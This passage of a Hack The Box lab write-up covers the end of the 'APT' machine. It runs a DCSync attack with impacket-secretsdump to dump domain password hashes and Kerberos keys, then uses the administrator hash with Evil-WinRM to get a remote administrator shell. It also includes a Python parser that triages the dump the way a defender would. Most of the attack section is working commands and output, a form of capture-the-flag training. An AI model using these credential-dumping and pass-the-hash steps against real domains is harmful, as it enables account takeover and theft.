Hashdump


After successfully conducting the NTLM relay attack and cracking the captured Net-NTLMv1 hash of the machine account, APT$, I have validated the cracked NT hash of the APT$ account, generating a TGT in the process.

Leveraging the TGT, I should be able to dump the hashes of the entire domain with a DCSync attack, since the APT$ account is essentially the DC host itself.

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=APT\$@apt.htb.local.ccache impacket-secretsdump 'htb.local/@apt.htb.local' -no-pass -k -dc-ip $IPv6       
Impacket v0.11.0 - Copyright 2023 Fortra
 
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
defaultaccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
apt$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
administrator:des-cbc-md5:0816d9d052239b8a
krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
krbtgt:des-cbc-md5:f8c26238c2d976bf
henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
henry.vinson:des-cbc-md5:73b6f71cae264fad
henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
apt$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
apt$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
apt$:des-cbc-md5:76c45245f104a4bf
[*] Cleaning up... 

Domain Level Compromise
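The dump above follows the domain\uid:rid:lmhash:nthash layout announced on its header line, followed by one Kerberos key per account and encryption type. As an added example (not part of the original writeup or of Impacket), the following Python parses that output and triages it the way a defender would after such a compromise: accounts with the empty-password NT hash, machine accounts, and accounts still holding single-DES keys, all of which need a credential reset. The sample lines are copied from the secretsdump output above; the Account class and helper names are my own.

```python
import re
from dataclasses import dataclass, field

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash (MD4) of the empty password
NTLM_LINE = re.compile(r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
                       r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")
KRB_LINE = re.compile(r"^(?P<user>[^:]+):(?P<etype>[a-z0-9-]+):(?P<key>[0-9a-f]+)$")

# Sample input: lines copied from the secretsdump output above.
SAMPLE = """\
administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
apt$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
administrator:des-cbc-md5:0816d9d052239b8a
apt$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
"""
@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str
    kerberos_keys: dict = field(default_factory=dict)  # etype -> hex key
    @property
    def is_machine(self) -> bool:      # computer accounts end in '$'
        return self.user.endswith("$")

    @property
    def empty_password(self) -> bool:  # NT hash of "" means a blank password
        return self.nt == EMPTY_NT

def parse_secretsdump(text: str) -> dict:
    """Parse NTDS hash lines and Kerberos key lines into Account objects keyed by user."""
    accounts = {}
    for line in map(str.strip, text.splitlines()):
        if m := NTLM_LINE.match(line):
            accounts[m["user"]] = Account(m["user"], int(m["rid"]), m["lm"], m["nt"])
        elif (m := KRB_LINE.match(line)) and m["user"] in accounts:
            accounts[m["user"]].kerberos_keys[m["etype"]] = m["key"]
    return accounts

def triage(accounts: dict) -> dict:
    """Group accounts by the conditions that warrant a credential reset after a dump."""
    return {
        "empty_password": sorted(a.user for a in accounts.values() if a.empty_password),
        "machine_accounts": sorted(a.user for a in accounts.values() if a.is_machine),
        "des_keys": sorted(a.user for a in accounts.values() if "des-cbc-md5" in a.kerberos_keys),
    }
```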

Shell Drop


┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=APT\$@apt.htb.local.ccache impacket-psexec 'htb.local/@apt.htb.local' -no-pass -k -dc-ip $IPv6
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Requesting shares on apt.htb.local.....
[-] share 'backup' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.

impacket-psexec is not possible here: it needs a writable share to drop its service binary, and there is no C$ share, as enumerated earlier. However, I can use the administrator's NT hash to authenticate to the WinRM server and start a PowerShell session.

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ evil-winrm -i apt.htb.local -u administrator -H 'c370bddf384a691d811ff3495e8a72e2'
 
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
apt
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::240
   IPv6 Address. . . . . . . . . . . : dead:beef::44d8:93c7:dd88:c522
   IPv6 Address. . . . . . . . . . . : dead:beef::b885:d62a:d679:573f
   Link-local IPv6 Address . . . . . : fe80::44d8:93c7:dd88:c522%5
   IPv4 Address. . . . . . . . . . . : 10.10.10.213
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : dead:beef::1
                                       fe80::250:56ff:feb9:d784%5
                                       10.10.10.2

System Level Compromise